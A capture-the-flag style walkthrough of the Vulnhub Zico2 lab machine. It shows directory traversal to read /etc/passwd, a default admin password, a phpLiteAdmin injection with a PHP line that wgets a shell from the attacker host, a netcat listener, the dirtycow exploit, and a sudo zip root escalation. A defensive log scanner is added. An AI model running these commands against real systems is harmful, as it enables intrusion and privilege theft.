Zico2

Vulnhub virtual machine; one of the last of my Vulnhub boxes from the OSCP prep list. On Zico2, enumeration turned up an admin login that accepted basic credentials. The backend was then used to pull down a PHP reverse shell, which led to privilege escalation with dirtycow and zip.


Legal Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only perform testing on systems you OWN and/or have express written permission for. Use information at your own risk.

By continued reading, you acknowledge the aforementioned user risk/responsibilities.


Search for VM on network

netdiscover -r 192.168.56.0/24

Target: 192.168.56.122

Enumeration

Nmap Scan:

nmap -sV -sC -oA nmap/zico2.nmap 192.168.56.122

Interesting ports:

80 - web server
111 - unknown at this point
22 - SSH (front door)

Investigate port 80

Checking out the page source: nothing of immediate interest.

Navigating around the site, pages are served by a PHP backend, which could be useful later for a PHP reverse shell.

Test for directory traversal with an escape

http://192.168.56.122/view.php?page=../../../../../../etc/passwd

Now we have an idea of the users. Saved the passwd file locally and parsed it for just the users that have a shell.

grep '/bin/.*sh' passwd > sh.userlist

At the end, just the usernames were appended to sh.userlist.

Gobuster

gobuster -u 192.168.56.122 -w /usr/share/seclists/Discovery/Web-Content/common.txt -s '200,204,301,302,307,403,500' -e

/dbadmin/ is accessible:

We found a web application name and version number along with a password field. Testing generic passwords:

password
zico
admin

Password: Admin # Let's take a second and talk about how this is a terrible password.

“we're in!”

Investigate /usr/databases/test_users and click the info button.

Looks like MD5 hashes; cracked via lookup at https://www.md5online.org/md5-decrypt.html

root: 34kroot34
zico: [email protected]

Quick attempt to SSH using the credentials: no go.

searchsploit

searchsploit phpliteadmin

Mirror 24044.txt:

searchsploit -m exploits/php/webapps/24044.txt

Looks like we can create a new database and then upload a reverse shell.

Created a database named execwashere.php.

Created a table named gimmeshell with Number of Fields: 1.

Used test for the field name, selected TEXT, and inserted the default value <?php phpinfo(); ?>.

Navigated to the location of execwashere.php:

http://192.168.56.122/view.php?page=../../../usr/databases/execwashere.php

Let's go input a PHP reverse shell, since we know we can reach /usr/databases by creating a new database named test.php:

<?php system("cd /usr/databases/; wget http://192.168.56.102:8000/phpshell.php"); ?>

Launch our reverse shell via phpshell.php.

Set up listener:

nc -lvnp 9000
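
The traversal through view.php?page= and the later include of a database file written under /usr/databases both leave a clear trace in the web server's access log. The following is an added example, not part of the original writeup, that scans Apache combined-format log lines for those request patterns and for hits on the /dbadmin/ panel; the log lines, IPs and file names are constructed to mirror the lab above.

```python
import re
from urllib.parse import parse_qs, unquote, urlparse

# Constructed sample lines in Apache combined format (not real logs from the box);
# the requests mirror the traversal and database-include paths used in the writeup.
SAMPLE_LOG = """\
192.168.56.102 - - [10/Jan/2018:12:00:01 +0000] "GET /view.php?page=tools HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.56.102 - - [10/Jan/2018:12:00:05 +0000] "GET /view.php?page=../../../../../../etc/passwd HTTP/1.1" 200 1873 "-" "Mozilla/5.0"
192.168.56.102 - - [10/Jan/2018:12:00:09 +0000] "GET /view.php?page=..%252f..%252f..%252fusr%2fdatabases%2fexecwashere.php HTTP/1.1" 200 940 "-" "Mozilla/5.0"
192.168.56.102 - - [10/Jan/2018:12:00:12 +0000] "GET /dbadmin/test_db.php HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def request_reasons(target: str) -> list[str]:
    """Return the rule names a single request target trips (empty list = clean)."""
    url = urlparse(target)
    reasons = []
    if url.path.startswith("/dbadmin/"):
        reasons.append("admin-panel request")  # phpLiteAdmin should not be reachable from untrusted networks
    for name, values in parse_qs(url.query).items():
        for value in values:
            # parse_qs decodes once; decode again so double-encoded %252e%252e is caught too
            decoded = unquote(value).replace("\\", "/")
            if "../" in decoded:
                reasons.append(f"path traversal in {name}")
            if decoded.lower().endswith(".php") and "/" in decoded:
                reasons.append(f"{name} names a .php file by path")  # include of an attacker-written DB-as-PHP file
    return reasons

def scan_log(text: str) -> list[tuple[str, str, str, list[str]]]:
    """Return (ip, status, target, reasons) for every line that trips at least one rule."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        reasons = request_reasons(m["target"])
        if reasons:
            hits.append((m["ip"], m["status"], m["target"], reasons))
    return hits

if __name__ == "__main__":
    # A 200 on a flagged request means the include succeeded, so triage those first.
    for ip, status, target, reasons in scan_log(SAMPLE_LOG):
        print(f"{ip} {status} {target}: {', '.join(reasons)}")
```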

dirtycow

Inspect the uname output:

This kernel version is susceptible to dirtycow.

Download the dirty.c exploit from https://www.exploit-db.com/exploits/40839, set up a web server and wget it from the box:

wget http://192.168.56.102:8000/dirty.c

Compile

gcc -pthread dirty.c -o dirty -lcrypt


Priv-Esc

Navigating to /home/zico/, discovered wordpress and wp-config.php.

We now have credentials for zico:

zico:sWfCsfJSPV9H3AmQzw8

Attempt SSH with the credentials:

Check permissions:

sudo -l

Root&Loot

Taking advantage of zip to elevate to root:

sudo zip /tmp/test.zip /home/zico/wordpress -T --unzip-command="sh -c /bin/bash"

Connect to the dirtycow’d SSH.

“Bring me the root” -exec